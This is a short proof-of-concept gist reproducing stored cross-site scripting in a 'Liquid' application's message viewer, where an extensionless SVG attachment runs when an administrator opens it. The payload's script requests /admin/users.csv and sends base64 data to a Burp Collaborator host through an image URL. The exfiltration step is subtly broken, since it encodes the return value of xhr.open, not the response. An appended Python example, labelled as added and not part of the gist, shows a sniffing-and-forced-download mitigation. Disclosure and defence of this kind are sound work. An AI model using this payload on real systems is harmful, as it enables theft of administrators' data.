
@rodnt

rodnt/xss-liquid-no-ext.gif Secret

Created Apr 4, 2021
XSS liquid files
Steps to reproduce
1 - Create a file without an extension, with the content below inside.
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,100 100,0" fill="#0000FF" stroke="#0000FF"/>
<script type="text/javascript">
function a(){
alert(1);
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
alert(xhr.responseText);
}
}
var data = xhr.open('GET', 'https://192.168.43.113/admin/users.csv', true);
b64 = btoa(unescape(encodeURIComponent(data)));
var img = document.createElement('img');
img.src = 'https://2sv7gm42cnqse2cap2vkdihlscy2mr.burpcollaborator.net/' + b64 + '.png';
xhr.send(null);
}
a();
</script>
</svg>
```
2 - As an external user, send an email with that file (without any extension) to the admin or someone else.
3 - With the admin account, go to the menu and click on "Data"; inside the Data menu click "Messages", and inside Messages select the message you sent at step 2. In the table, click on the filename row of your file; the JavaScript code will be executed.
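A server-side mitigation for the behaviour reproduced above, as an added example that is not part of the gist: attachments are classified by their first bytes rather than by extension, and are always served as a forced download with sniffing disabled, so an extensionless SVG carrying `<script>` is never rendered in the viewer's origin. Function names and the sample bytes are constructed for this example.

```python
import re

# Markers of "active content": a browser that sniffs the body as SVG or HTML
# will parse it as a document and run any <script> it carries, no matter what
# the filename or extension says (the gist's file has no extension at all).
ACTIVE_CONTENT_MARKERS = (
    re.compile(rb"<\s*svg\b", re.IGNORECASE),
    re.compile(rb"<!DOCTYPE\s+svg\b", re.IGNORECASE),
    re.compile(rb"<\s*script\b", re.IGNORECASE),
    re.compile(rb"<\s*html\b", re.IGNORECASE),
)

def is_active_content(data: bytes, sniff_len: int = 4096) -> bool:
    """Return True if the leading bytes look like SVG/HTML/script content."""
    head = data[:sniff_len]
    return any(pattern.search(head) for pattern in ACTIVE_CONTENT_MARKERS)

def attachment_headers(filename: str, data: bytes) -> dict:
    """Response headers for serving a user-supplied attachment safely.

    Every attachment is forced to download under an opaque type, the browser is
    told not to sniff, and a sandboxing CSP blocks script execution even if a
    client still manages to render the body inline. Active content is treated
    the same way; the flag is only there so callers can log or quarantine it.
    """
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "attachment"
    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    headers["_active_content"] = is_active_content(data)  # constructed audit flag, not sent
    return headers

# Constructed sample: an extensionless file whose body is an SVG with a script.
SAMPLE_SVG = (b'<?xml version="1.0" standalone="no"?>\n'
              b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">'
              b'<script type="text/javascript">alert(1);</script></svg>')
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed PNG-like header

if __name__ == "__main__":
    for name, body in (("xss-liquid-no-ext", SAMPLE_SVG), ("photo", SAMPLE_PNG)):
        h = attachment_headers(name, body)
        print(name, "active" if h["_active_content"] else "inert", h["Content-Disposition"])
```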
@rodnt rodnt commented Apr 4, 2021

xss-no-type-bypass
